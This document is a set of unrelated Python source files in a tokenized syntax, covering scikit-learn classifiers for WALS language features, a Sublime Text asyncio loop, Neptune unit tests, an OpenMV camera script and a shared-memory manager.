"""Simple sckit-learn classification utilities."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>math<import_stmt>pickle<import_from_stmt>absl flags<import_from_stmt>absl logging<import_stmt>numpy<as>np<import_from_stmt>sklearn model_selection<import_from_stmt>sklearn.compose make_column_transformer<import_from_stmt>sklearn.discriminant_analysis LinearDiscriminantAnalysis<import_from_stmt>sklearn.discriminant_analysis QuadraticDiscriminantAnalysis<import_from_stmt>sklearn.ensemble AdaBoostClassifier<import_from_stmt>sklearn.ensemble BaggingClassifier<import_from_stmt>sklearn.ensemble RandomForestClassifier<import_from_stmt>sklearn.gaussian_process GaussianProcessClassifier<import_from_stmt>sklearn.linear_model LogisticRegression<import_from_stmt>sklearn.linear_model RidgeClassifier<import_from_stmt>sklearn.model_selection RepeatedStratifiedKFold<import_from_stmt>sklearn.naive_bayes GaussianNB<import_from_stmt>sklearn.neural_network MLPClassifier<import_from_stmt>sklearn.preprocessing OneHotEncoder<import_from_stmt>sklearn.preprocessing StandardScaler<import_from_stmt>sklearn.svm LinearSVC<import_from_stmt>sklearn.tree DecisionTreeClassifier<line_sep># pylint: disable=invalid-name
flags.DEFINE_boolean("transform_inputs" <true> "If enabled, will scale the numeric features and convert categorical "<concat>"features to one-hot encoding.")<line_sep>flags.DEFINE_list("classifiers" ["LogisticRegression"] "Type of the classifier. One of: \"LogisticRegression\", \"SVM\", "<concat>"\"RidgeRegression\", \"RandomForest\", \"AdaBoost\", \"LDA\", \"QDA\", "<concat>"\"GaussianProcess\", \"DecisionTree\", \"DNN\", \"GaussianNaiveBayes\", "<concat>"\"BaggingEnsemble\".")<line_sep>flags.DEFINE_boolean("use_implicationals" <true> "If True, use the implicational features.")<line_sep>flags.DEFINE_string("best_configurations_file" "" "File containing the JSON dictionary from feature names to the "<concat>"respective best model and data configurations. When `--cross_validate` "<concat>"is enabled, this is the output file to be generated. In all other modes "<concat>"this is an input file.")<line_sep>FLAGS=flags.FLAGS<line_sep># List of all supported classifiers.
ALL_MODELS=["AdaBoost" "DNN" "DecisionTree" "GaussianProcess" "LDA" "LogisticRegression" "QDA" "RandomForest" "RidgeRegression" "SVM" "GaussianNaiveBayes" "BaggingEnsemble"]<line_sep># Model information keys.
MODEL_INFO_NAME_KEY="name"<line_sep>MODEL_INFO_SPARSITY_KEY="no_cv"# Not enough data.
MODEL_INFO_SCORE_KEY="accuracy"<line_sep>MODEL_INFO_CANDIDATES_KEY="candidates"<line_sep># Random seed.
_RANDOM_STATE=4611170<line_sep># WALS language code.
_LANGUAGE_CODE="wals_code"<def_stmt>_prepare_data input_df<block_start>"""Splits data into features and labels."""<line_sep>class_label="target_value"<line_sep>y=input_df[class_label].copy()<line_sep>X_columns_to_drop=[class_label _LANGUAGE_CODE "target_feature"]<line_sep>X=input_df.drop(columns=X_columns_to_drop)<line_sep><return>X y<block_end><def_stmt>_split_into_features_and_labels feature_name feature_maker training_df dev_df transform_inputs<block_start>"""Preprocesses the data and returns the features and labels."""<line_sep># Get the label class counts for the training data.
train_class_counts=training_df.target_value.value_counts()<line_sep>train_class_counts=list(zip(train_class_counts.index train_class_counts.values))<line_sep>logging.info("%s: Class counts: %s" feature_name train_class_counts)<line_sep># Perform the split into features and labels of the training set.
X_train,y_train=_prepare_data(training_df)<line_sep>logging.info("%s: Input feature dimensions: %s" feature_name X_train.shape[1])<line_sep># Split dev set.
X_dev,y_dev=_prepare_data(dev_df)<line_sep># Numeric columns are transformed using standard scaler and categorical
# columns are converted to one-hot.
<if_stmt>transform_inputs<block_start>numeric_cols=["latitude" "longitude"]<line_sep>categorical_cols=[]<for_stmt>col_name X_train.columns<block_start><if_stmt>(col_name<in>feature_maker.prob_features<or>col_name<in>feature_maker.count_features)<block_start>numeric_cols.append(col_name)# Counts, probabilities.
<block_end><elif_stmt>col_name<in>feature_maker.categorical_features<block_start>categorical_cols.append(col_name)# Categorical feature values.
<block_end><block_end>inputs_transformer=make_column_transformer((StandardScaler() numeric_cols) (OneHotEncoder(handle_unknown="ignore") categorical_cols) remainder="passthrough")<line_sep>X_train=inputs_transformer.fit_transform(X_train)<if_stmt>X_dev.shape[0]# Do we have enough samples?
<block_start>X_dev=inputs_transformer.transform(X_dev)<block_end><else_stmt><block_start>logging.warning("Feature %s not found in the dev set. This is likely to "<concat>"crash the evaluation mode!" feature_name)<block_end><block_end><else_stmt># Transform data frames to Numpy. The input transformer in the branch above
# returns Numpy arrays.
<block_start>X_train=X_train.to_numpy()<line_sep>X_dev=X_dev.to_numpy()<block_end><return>(X_train y_train.to_numpy() X_dev y_dev.to_numpy() train_class_counts)<block_end><def_stmt>prepare_data feature_maker feature_name use_implicationals=<true> prediction_mode=<false><block_start>"""Prepares the features and labels for the given WALS feature name."""<line_sep># Process training and dev data for the feature. Store the WALS language codes
# for the development set aside.
training_df,dev_df=feature_maker.process_data(feature_name prediction_mode=prediction_mode)<assert_stmt>_LANGUAGE_CODE<in>dev_df.columns<line_sep>dev_language_codes=list(dev_df[_LANGUAGE_CODE].values)<if_stmt><not>use_implicationals<block_start>logging.info("Discarding implicational features")<line_sep>training_df=feature_maker.select_columns(training_df discard_implicationals=<true>)<line_sep>dev_df=feature_maker.select_columns(dev_df discard_implicationals=<true>)<block_end># Split the data into features and labels.
X_train,y_train,X_dev,y_dev,train_class_counts=(_split_into_features_and_labels(feature_name feature_maker training_df dev_df FLAGS.transform_inputs))<line_sep><return>X_train y_train X_dev y_dev dev_language_codes train_class_counts<block_end><def_stmt>_make_classifier classifier_name<block_start>"""Classifier factory."""<line_sep># Class weights: if you set this to None, you'd get much better accuracies,
# but it's likely that the classifier will be overpredicting the majority
# class.
class_weight_strategy=<none># Note: this may set "balanced" as default.
max_iters=10000<if_stmt>classifier_name<eq>"AdaBoost"<block_start>model=AdaBoostClassifier(n_estimators=100)<block_end><elif_stmt>classifier_name<eq>"LogisticRegression"<block_start>model=LogisticRegression(max_iter=max_iters class_weight=class_weight_strategy)<block_end><elif_stmt>classifier_name<eq>"LDA"<block_start>model=LinearDiscriminantAnalysis(tol=1E-6)<block_end><elif_stmt>classifier_name<eq>"QDA"<block_start>model=QuadraticDiscriminantAnalysis()<block_end><elif_stmt>classifier_name<eq>"DNN"<block_start>model=MLPClassifier(random_state=_RANDOM_STATE hidden_layer_sizes=[200])<block_end><elif_stmt>classifier_name<eq>"DecisionTree"<block_start>model=DecisionTreeClassifier(random_state=_RANDOM_STATE min_samples_leaf=3 criterion="entropy" class_weight="balanced")<block_end><elif_stmt>classifier_name<eq>"GaussianProcess"<block_start>model=GaussianProcessClassifier(random_state=_RANDOM_STATE max_iter_predict=200)<block_end><elif_stmt>classifier_name<eq>"RandomForest"<block_start>model=RandomForestClassifier(n_estimators=200 random_state=_RANDOM_STATE min_samples_leaf=3 criterion="entropy" class_weight="balanced_subsample")<block_end><elif_stmt>classifier_name<eq>"RidgeRegression"<block_start>model=RidgeClassifier(normalize=<true> tol=1E-5 class_weight=class_weight_strategy)<block_end><elif_stmt>classifier_name<eq>"SVM"<block_start>model=LinearSVC(max_iter=max_iters class_weight=class_weight_strategy)<block_end><elif_stmt>classifier_name<eq>"GaussianNaiveBayes"<block_start>model=GaussianNB()<block_end><elif_stmt>classifier_name<eq>"BaggingEnsemble"<block_start>model=BaggingClassifier(random_state=_RANDOM_STATE)<block_end><else_stmt><block_start><raise>ValueError("Unsupported classifier: %s"%classifier_name)<block_end><return>model<block_end><def_stmt>cross_validate feature_name classifier_name X y cv_num_folds cv_num_repeats<block_start>"""Runs repeated stratified $k$-fold cross-validation.
Returns multiple cross-validation metrics as a dictionary, where for each
metric mean and variance across multiple repeats and folds is summarized.
Args:
feature_name: (string) Name of the WALS feature.
classifier_name: (string) Classifier name.
X: (numpy array) Input features.
y: (numpy array) Labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing cross-validation scores and stats.
"""<line_sep>model=_make_classifier(classifier_name)<line_sep>scoring=["f1_micro" "precision_micro" "recall_micro" "accuracy"]<try_stmt># Really primitive logic to figure out class distribution.
<block_start>_,y_counts=np.unique(y return_counts=<true>)<line_sep>y_max_freq=np.max(y_counts)<line_sep># Check if the class counts are not reliable to run cross-validation.
<if_stmt>y_max_freq<l>cv_num_folds<block_start>logging.warning("[%s] %s: Not enough data. Fitting the model instead "<concat>"of running CV" feature_name classifier_name)<line_sep># Simply fit the model.
model.fit(X y)<line_sep>cv_scores={}<line_sep>cv_scores["accuracy"]=(model.score(X y) 0.0)<line_sep>cv_scores[MODEL_INFO_SPARSITY_KEY]=<true><line_sep><return>cv_scores<block_end><else_stmt><block_start>logging.info("[%s] Running cross-validation of %s (k=%d, n=%d) ..." feature_name classifier_name cv_num_folds cv_num_repeats)<line_sep># Run cross-validation.
cv=RepeatedStratifiedKFold(n_splits=cv_num_folds n_repeats=cv_num_repeats random_state=_RANDOM_STATE)<line_sep>cv_scores=model_selection.cross_validate(model X y cv=cv scoring=scoring n_jobs=cv_num_folds)<line_sep>cv_scores[MODEL_INFO_SPARSITY_KEY]=<false><block_end><block_end><except_stmt>Exception<as>e# pylint: disable=broad-except
<block_start>logging.error("[%s] %s: CV: Exception: %s" feature_name classifier_name e)<line_sep><return><none><block_end><del_stmt>cv_scores["fit_time"]<del_stmt>cv_scores["score_time"]<for_stmt>score_name scoring<block_start>scores_vec_key="test_"+score_name<line_sep>cv_scores[score_name]=(np.mean(cv_scores[scores_vec_key]) np.var(cv_scores[scores_vec_key]))<del_stmt>cv_scores[scores_vec_key]<block_end># Sanity check.
<if_stmt>math.isnan(cv_scores["accuracy"][0])<block_start><return><none><block_end>logging.info("[train] %s: CV scores for %s: %s" feature_name classifier_name cv_scores)<line_sep><return>cv_scores<block_end><def_stmt>train_classifier feature_name classifier_name X y model_path=<none><block_start>"""Trains classifier."""<line_sep>model=_make_classifier(classifier_name)<line_sep>logging.info("%s: Fitting %s model ..." feature_name classifier_name)<line_sep>model.fit(X y)<line_sep>logging.info("%s: %s: Score: %s" feature_name classifier_name model.score(X y))<if_stmt>model_path<block_start>logging.info("Saving model to \"%s\" ..." model_path)<line_sep>pickle.dump(model open(model_path "wb"))<block_end><return>model<block_end><def_stmt>select_best_model classifiers feature_name X_train y_train cv_num_folds cv_num_repeats<block_start>"""Performs cross-validation of various classifiers for a given feature.
Returns a dictionary with the best classifier name, its score and the number
of candidates it was selected from.
Args:
classifiers: (list) Names of the classifiers to choose from.
feature_name: (string) WALS feature name.
X_train: (numpy array) Training features.
y_train: (numpy array) Training labels.
cv_num_folds: (int) Number of folds ($k$).
cv_num_repeats: (int) Number of repetitions.
Returns:
Dictionary containing best configuration.
"""<line_sep>scores=[]<for_stmt>classifier_name classifiers<block_start>clf_scores=cross_validate(feature_name classifier_name X_train y_train cv_num_folds cv_num_repeats)<if_stmt>clf_scores# Cross-validation may fail for some settings.
<block_start>scores.append((classifier_name clf_scores))<block_end><block_end># Sort the scores by the highest accuracy mean. For some reason F1 and
# accuracy are the same (as is the precision and recall). Investigate.
scores=sorted(scores key=<lambda>score:score[1]["accuracy"][0] reverse=<true>)<if_stmt>len(scores)<l>5<block_start><raise>ValueError("Expected at least five candidate classifiers!")<block_end>best_model=scores[0]<line_sep><return>{MODEL_INFO_NAME_KEY:best_model[0] # Model name.
# Accuracy mean.
MODEL_INFO_SCORE_KEY:best_model[1]["accuracy"][0] # Boolean sparsity marker.
MODEL_INFO_SPARSITY_KEY:best_model[1][MODEL_INFO_SPARSITY_KEY] # Overall number of successful evals.
MODEL_INFO_CANDIDATES_KEY:len(scores)}<block_end>
|
<import_from_future_stmt> annotations<import_stmt>asyncio<import_stmt>sublime<import_stmt>threading<class_stmt>Handle<block_start><def_stmt>__init__ self callback args<block_start>self.callback=callback<line_sep>self.args=args<block_end><def_stmt>__call__ self<block_start><if_stmt>self.callback<block_start>self.callback(*self.args)<block_end><block_end><def_stmt>cancel self<block_start>self.callback=<none><line_sep>self.args=<none><block_end><block_end><class_stmt>SublimeEventLoop(asyncio.AbstractEventLoop)<block_start><def_stmt>run_forever self<block_start><raise>NotImplementedError<block_end><def_stmt>run_until_complete self future<block_start><raise>NotImplementedError<block_end><def_stmt>stop self<block_start><raise>NotImplementedError<block_end><def_stmt>is_running self<block_start><raise>NotImplementedError<block_end><def_stmt>is_closed self<block_start><raise>NotImplementedError<block_end><def_stmt>close self<block_start><raise>NotImplementedError<block_end><def_stmt>shutdown_asyncgens self<block_start><raise>NotImplementedError<block_end># Methods scheduling callbacks. All these return Handles.
<def_stmt>_timer_handle_cancelled self handle<block_start><raise>NotImplementedError<block_end><def_stmt>call_soon self callback *args context=<none><block_start>handle=Handle(callback args)<line_sep>sublime.set_timeout(handle 0)<line_sep><return>handle<block_end><def_stmt>call_later self delay callback *args context=<none><block_start>handle=Handle(callback args)<line_sep>sublime.set_timeout(handle delay<times>1000)<line_sep><return>handle<block_end><def_stmt>call_at self when callback *args<block_start><raise>NotImplementedError<block_end><def_stmt>time self<block_start><raise>NotImplementedError<block_end><def_stmt>create_future self<block_start><return>asyncio.futures.Future(loop=self)<block_end># Method scheduling a coroutine object: create a task.
<def_stmt>create_task self coro<block_start>task=asyncio.tasks.Task(coro loop=self)<if_stmt>task._source_traceback#type: ignore
<block_start><del_stmt>task._source_traceback[-1]#type: ignore
<block_end><return>task<block_end># Methods for interacting with threads.
<def_stmt>call_soon_threadsafe self callback *args<block_start><return>self.call_later(0 callback *args)<block_end><def_stmt>run_in_executor self executor func *args<block_start><raise>NotImplementedError<block_end><def_stmt>set_default_executor self executor<block_start><raise>NotImplementedError<block_end># Task factory.
<def_stmt>set_task_factory self factory<block_start><raise>NotImplementedError<block_end><def_stmt>get_task_factory self<block_start><raise>NotImplementedError<block_end># Error handlers.
<def_stmt>get_exception_handler self<block_start><raise>NotImplementedError<block_end><def_stmt>set_exception_handler self handler<block_start><raise>NotImplementedError<block_end><def_stmt>default_exception_handler self context<block_start><raise>NotImplementedError<block_end><def_stmt>call_exception_handler self context<block_start><import_from_stmt>.log log_exception<import_from_stmt>.error Error<try_stmt><block_start><if_stmt>'exception'<in>context<block_start><raise>context['exception']<block_end><else_stmt><block_start><raise>Error(context['message'])<block_end><block_end><except_stmt>Exception<as>e<block_start>log_exception()<block_end><block_end># Debug flag management.
<def_stmt>get_debug self<block_start><return><false><block_end><def_stmt>set_debug self enabled<block_start><raise>NotImplementedError<block_end><block_end>
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""The Base Operator Transformer interface."""<import_from_stmt>abc ABC abstractmethod<import_from_stmt>typing Any<class_stmt>BaseTransformer(ABC)<block_start>"""**DEPRECATED!** The interface for implementing methods which map from one `QMolecule` or
'WatsonHamiltonian' to another. These methods may or may not affect the size of the Hilbert
space.
"""<line_sep>@abstractmethod<def_stmt>transform self molecule_data:Any<block_start>"""Transforms one `QMolecule` or 'WatsonHamiltonian' into another one. This may or may
not affect the size of the Hilbert space.
Args:
molecule_data: the `QMolecule` or 'WatsonHamiltonian' to be transformed.
Returns:
A new `QMolecule` or 'WatsonHamiltonian' instance.
"""<line_sep><raise>NotImplementedError()<block_end><block_end>
|
__all__=["CompletionPort" "Event" "accept" "connect" "get_accept_addrs" "have_connectex" "makesockaddr" "maxAddrLen" "recv" "recvfrom" "send" ]<import_from_stmt>twisted_iocpsupport.iocpsupport # type: ignore[import]
CompletionPort Event accept connect get_accept_addrs have_connectex makesockaddr maxAddrLen recv recvfrom send <line_sep>
|
#
# Copyright (c) 2020, Neptune Labs Sp. z o.o.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
<import_stmt>unittest<import_stmt>uuid<import_from_stmt>neptune.new.exceptions MetadataInconsistency<import_from_stmt>neptune.new.internal.backends.neptune_backend_mock NeptuneBackendMock<import_from_stmt>neptune.new.internal.container_type ContainerType<import_from_stmt>neptune.new.internal.run_structure ContainerStructure<import_from_stmt>neptune.new.types.value Value<class_stmt>TestRunStructure(unittest.TestCase)<block_start><def_stmt>test_get_none self<block_start>exp=ContainerStructure[int dict]()<line_sep>self.assertEqual(exp.get(["some" "path" "val"]) <none>)<block_end><def_stmt>test_get_nested_variable_fails self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.get(["some" "path" "val" "nested"])<block_end><with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.get(["some" "path" "val" "nested" "nested"])<block_end><block_end><def_stmt>test_get_ns self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<line_sep>self.assertEqual(exp.get(["some" "path"]) {"val":3})<block_end><def_stmt>test_set self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<line_sep>self.assertEqual(exp.get(["some" "path" "val"]) 3)<block_end><def_stmt>test_set_nested_variable_fails self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.set(["some" "path" "val" "nested"] 3)<block_end><with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.set(["some" "path" "val" "nested" "nested"] 3)<block_end><block_end><def_stmt>test_set_ns_collision self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.set(["some" "path"] 5)<block_end><block_end><def_stmt>test_pop self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val1"] 3)<line_sep>exp.set(["some" "path" "val2"] 5)<line_sep>exp.pop(["some" "path" "val2"])<line_sep>self.assertEqual(exp.get(["some" "path" "val1"]) 3)<line_sep>self.assertEqual(exp.get(["some" "path" "val2"]) <none>)<line_sep>self.assertTrue("some"<in>exp.get_structure()<and>"path"<in>exp.get_structure()["some"])<block_end><def_stmt>test_pop_whole_ns self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val"] 3)<line_sep>exp.pop(["some" "path" "val"])<line_sep>self.assertEqual(exp.get(["some" "path" "val"]) <none>)<line_sep>self.assertFalse("some"<in>exp.get_structure())<block_end><def_stmt>test_pop_not_found self<block_start>exp=ContainerStructure[int dict]()<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.pop(["some" "path"])<block_end><block_end><def_stmt>test_pop_ns_fail self<block_start>exp=ContainerStructure[int dict]()<line_sep>exp.set(["some" "path" "val1"] 3)<with_stmt>self.assertRaises(MetadataInconsistency)<block_start>exp.pop(["some" "path"])<block_end><block_end><block_end><class_stmt>TestIterateSubpaths(unittest.TestCase)# pylint: disable=protected-access
<block_start>project_uuid=str(uuid.uuid4())<def_stmt>setUp self<block_start>self.backend=NeptuneBackendMock()<line_sep>exp=self.backend.create_run(self.project_uuid)<line_sep># FIXME test for projects
self.structure=self.backend._containers[(exp.id ContainerType.RUN)]<line_sep>self.structure.set(["attributes" "float"] Value())<line_sep>self.structure.set(["attributes" "node" "one"] Value())<line_sep>self.structure.set(["attributes" "node" "two"] Value())<line_sep>self.structure.set(["attributes" "node" "three"] Value())<line_sep>self.structure.set(["attributes" "int"] Value())<line_sep>self.structure.set(["attributes" "string"] Value())<block_end><def_stmt>test_iterate_empty_run self<block_start>empty_structure=ContainerStructure[Value dict]()<line_sep>self.assertListEqual(list(empty_structure.iterate_subpaths([])) [])<line_sep>self.assertListEqual(list(empty_structure.iterate_subpaths(["test"])) [])<block_end><def_stmt>test_iterate_empty_prefix self<block_start>prefix=[]<line_sep>expected_subpaths=["sys/id" "sys/state" "sys/owner" "sys/size" "sys/tags" "sys/creation_time" "sys/modification_time" "sys/failed" "attributes/float" "attributes/int" "attributes/string" "attributes/node/one" "attributes/node/two" "attributes/node/three" ]<line_sep>print(list(self.structure.iterate_subpaths(prefix)))<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><def_stmt>test_iterate_prefix self<block_start>prefix=["sys"]<line_sep>expected_subpaths=["sys/id" "sys/state" "sys/owner" "sys/size" "sys/tags" "sys/creation_time" "sys/modification_time" "sys/failed" ]<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><def_stmt>test_iterate_long_prefix self<block_start>prefix=["attributes" "node"]<line_sep>expected_subpaths=["attributes/node/one" "attributes/node/two" "attributes/node/three" ]<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><def_stmt>test_iterate_nonexistent_prefix self<block_start>prefix=["argh"]<line_sep>expected_subpaths=[]<line_sep>self.assertListEqual(list(self.structure.iterate_subpaths(prefix)) expected_subpaths)<block_end><block_end>
|
<import_stmt>image network rpc sensor struct<import_stmt>time<import_stmt>micropython<import_from_stmt>pyb Pin<import_from_stmt>pyb LED<line_sep># variables that can be changed
save_to_SD=<false><line_sep>sensor_format=sensor.RGB565<line_sep>#sensor_format = sensor.GRAYSCALE
# leds are used as an easy way to know if the remote camera has started fine
red_led=LED(1)<line_sep>green_led=LED(2)<line_sep>blue_led=LED(3)<line_sep>ir_led=LED(4)<def_stmt>led_control x<block_start><if_stmt>(x&1)<eq>0<block_start>red_led.off()<block_end><elif_stmt>(x&1)<eq>1<block_start>red_led.on()<block_end><if_stmt>(x&2)<eq>0<block_start>green_led.off()<block_end><elif_stmt>(x&2)<eq>2<block_start>green_led.on()<block_end><if_stmt>(x&4)<eq>0<block_start>blue_led.off()<block_end><elif_stmt>(x&4)<eq>4<block_start>blue_led.on()<block_end><if_stmt>(x&8)<eq>0<block_start>ir_led.off()<block_end><elif_stmt>(x&8)<eq>8<block_start>ir_led.on()<block_end><block_end>processing=<true><line_sep># pin to trigger the snapshot
pin4=Pin('P4' Pin.IN Pin.PULL_UP)<line_sep># communication with the controller cam
interface=rpc.rpc_spi_slave(cs_pin="P3" clk_polarity=1 clk_phase=0)<line_sep># here we always choose the QVGA format (320x240) inside a VGA image
#if this is changed, the camera have to calibrated again
# also, the logic of mask_height should be checked
img_width=320<line_sep>img_height=240<line_sep>#additionnal data for the mask height
<if_stmt>sensor_format<eq>sensor.RGB565<block_start>mask_height=int(img_height/8)<block_end><else_stmt><block_start>mask_height=int(img_height/4)<block_end>sensor.reset()<line_sep>sensor_size=sensor.VGA<line_sep>sensor.set_pixformat(sensor_format)<line_sep>sensor.set_framesize(sensor_size)<line_sep>sensor.set_windowing((int((sensor.width()-img_width)/2) int((sensor.height()-img_height)/2) img_width img_height))<line_sep># the following is not really needed, this is to do the same as the controller cam
sensor.skip_frames(time=2000)<line_sep>sensor.snapshot()<line_sep>################################################################
# Call Backs
################################################################
<def_stmt>sensor_config data<block_start><global>processing<line_sep>gain_db,exposure_us,r_gain_db,g_gain_db,b_gain_db=struct.unpack("<fIfff" data)<line_sep>sensor.set_auto_gain(<false> gain_db)<line_sep>sensor.set_auto_exposure(<false> exposure_us)<line_sep>sensor.set_auto_whitebal(<false> (r_gain_db g_gain_db b_gain_db))<line_sep>processing=<false><line_sep><return>struct.pack("<fIfff" gain_db exposure_us r_gain_db g_gain_db b_gain_db)<block_end><def_stmt>raw_image_read_cb <block_start><global>processing<line_sep>interface.put_bytes(sensor.get_fb().bytearray() 5000)# timeout
processing=<false><block_end><def_stmt>raw_image_read data<block_start>interface.schedule_callback(raw_image_read_cb)<line_sep><return>bytes()<block_end><def_stmt>loop_callback <block_start><global>processing<if_stmt><not>processing<block_start><raise>Exception<block_end><block_end># Register call backs.
interface.register_callback(raw_image_read)<line_sep>interface.register_callback(sensor_config)<line_sep>interface.setup_loop_callback(loop_callback)<line_sep># a simple visual way to know the slave cam has started properly
# 2 blue blinks
led_control(4)<line_sep>time.sleep(500)<line_sep>led_control(0)<line_sep>time.sleep(500)<line_sep>led_control(4)<line_sep>time.sleep(500)<line_sep>led_control(0)<line_sep># configuration step
<try_stmt><block_start>processing=<true><line_sep>interface.loop()<block_end><except_stmt><block_start><pass><block_end>#stabilisation of the cam
sensor.skip_frames(time=2000)<line_sep># save the ref image used for the diff
#print("About to save background image...")
data_fb=sensor.alloc_extra_fb(img_width img_height sensor.RGB565)<line_sep>ref_img=sensor.alloc_extra_fb(img_width img_height sensor_format)<line_sep>img=sensor.snapshot()<line_sep>img.remap(data_fb right=<true>)<line_sep>ref_img.replace(img)<line_sep>#print("Saved background image - Now frame differencing!")
# now add an additionnal part that will convey the mask info
sensor.set_windowing((int((sensor.width()-img_width)/2) int((sensor.height()-img_height)/2) img_width img_height+mask_height))<line_sep># serve for ever
<while_stmt><true><block_start><try_stmt><block_start>processing=<true><while_stmt><not>pin4.value()<block_start><pass><block_end># get the image and undistort it
sent_image=sensor.snapshot()<line_sep>sent_image.remap(data_fb right=<true>)<line_sep># diff it with the ref image that has also been undistorted
sent_image.difference_special(ref_img data_fb 25 40 400 2000)<line_sep>interface.loop()<block_end><except_stmt><block_start><pass><block_end><block_end>
|
<import_stmt>tempfile<import_stmt>mmap<import_stmt>os<import_stmt>logging<import_from_stmt>exception_handler PrintGetExceptionDetails<line_sep># ***********************************************************************************
# Shared memory management
#
<class_stmt>SharedMemoryManager<block_start><def_stmt>__init__ self shmFlags=<none> name=<none> size=<none><block_start><try_stmt><block_start>self._shmFilePath='/dev/shm'<line_sep>self._shmFileName=name<if_stmt>self._shmFileName<is><none><block_start>self._shmFileName=next(tempfile._get_candidate_names())<block_end>self._shmFileSize=size<if_stmt>self._shmFileSize<is><none><block_start>self._shmFileSize=1024<times>1024<times>10<block_end># Bytes (10MB)
self._shmFileFullPath=os.path.join(self._shmFilePath self._shmFileName)<line_sep>self._shmFlags=shmFlags<line_sep># See the NOTE section here: https://docs.python.org/2/library/os.html#os.open for details on shmFlags
<if_stmt>self._shmFlags<is><none><block_start>self._shmFile=open(self._shmFileFullPath 'r+b')<line_sep>self._shm=mmap.mmap(self._shmFile.fileno() self._shmFileSize)<block_end><else_stmt><block_start>self._shmFile=os.open(self._shmFileFullPath self._shmFlags)<line_sep>os.ftruncate(self._shmFile self._shmFileSize)<line_sep>self._shm=mmap.mmap(self._shmFile self._shmFileSize mmap.MAP_SHARED mmap.PROT_WRITE|mmap.PROT_READ)<block_end># Dictionary to host reserved mem blocks
# self._mem_slots[sequenceNo] = [Begin, End] (closed interval)
self._memSlots=dict()<line_sep>logging.info('Shared memory name: {0}'.format(self._shmFileFullPath))<block_end><except_stmt><block_start>PrintGetExceptionDetails()<line_sep><raise><block_end><block_end><def_stmt>ReadBytes self memorySlotOffset memorySlotLength<block_start><try_stmt># This is Non-Zero Copy operation
# self._shm.seek(memorySlotOffset, os.SEEK_SET)
# bytesRead = self._shm.read(memorySlotLength)
# return bytesRead
#Zero-copy version
<block_start><return>memoryview(self._shm)[memorySlotOffset:memorySlotOffset+memorySlotLength].toreadonly()<block_end><except_stmt><block_start>PrintGetExceptionDetails()<line_sep><raise><block_end><block_end># Returns None if no availability
# Returns closed interval [Begin, End] address with available slot
<def_stmt>GetEmptySlot self seqNo sizeNeeded<block_start>address=<none><if_stmt>sizeNeeded<l>1<block_start><return>address<block_end># Empty memory
<if_stmt>len(self._memSlots)<l>1<block_start><if_stmt>self._shmFileSize<ge>sizeNeeded<block_start>self._memSlots[seqNo]=(0 sizeNeeded-1)<line_sep>address=(0 sizeNeeded-1)<block_end><else_stmt><block_start>address=<none><block_end><block_end><else_stmt><block_start>self._memSlots={k:v<for>k,v sorted(self._memSlots.items() key=<lambda>item:item[1])}<line_sep># find an available memory gap = sizeNeeded
prevSlotEnd=0<for_stmt>k,v self._memSlots.items()<block_start><if_stmt>(v[0]-prevSlotEnd-1)<ge>sizeNeeded<block_start>address=(prevSlotEnd+1 prevSlotEnd+sizeNeeded)<line_sep>self._memSlots[seqNo]=(address[0] address[1])<line_sep><break><block_end><else_stmt><block_start>prevSlotEnd=v[1]<block_end><block_end># no gap in between, check last possible gap
<if_stmt>address<is><none><block_start><if_stmt>(self._shmFileSize-prevSlotEnd+1)<ge>sizeNeeded<block_start>address=(prevSlotEnd+1 prevSlotEnd+sizeNeeded)<line_sep>self._memSlots[seqNo]=(address[0] address[1])<block_end><block_end><block_end># interval [Begin, End]
<return>address<block_end><def_stmt>DeleteSlot self seqNo<block_start><try_stmt><block_start><del_stmt>self._memSlots[seqNo]<line_sep><return><true><block_end><except_stmt>KeyError<block_start><return><false><block_end><block_end><def_stmt>__del__ self<block_start><try_stmt><block_start><if_stmt>self._shmFlags<is><none><block_start>self._shmFile.close()<block_end><else_stmt><block_start>os.close(self._shmFile)<block_end><block_end><except_stmt><block_start>PrintGetExceptionDetails()<line_sep><raise><block_end><block_end><block_end>
|
"""
ELF architecture detection module.
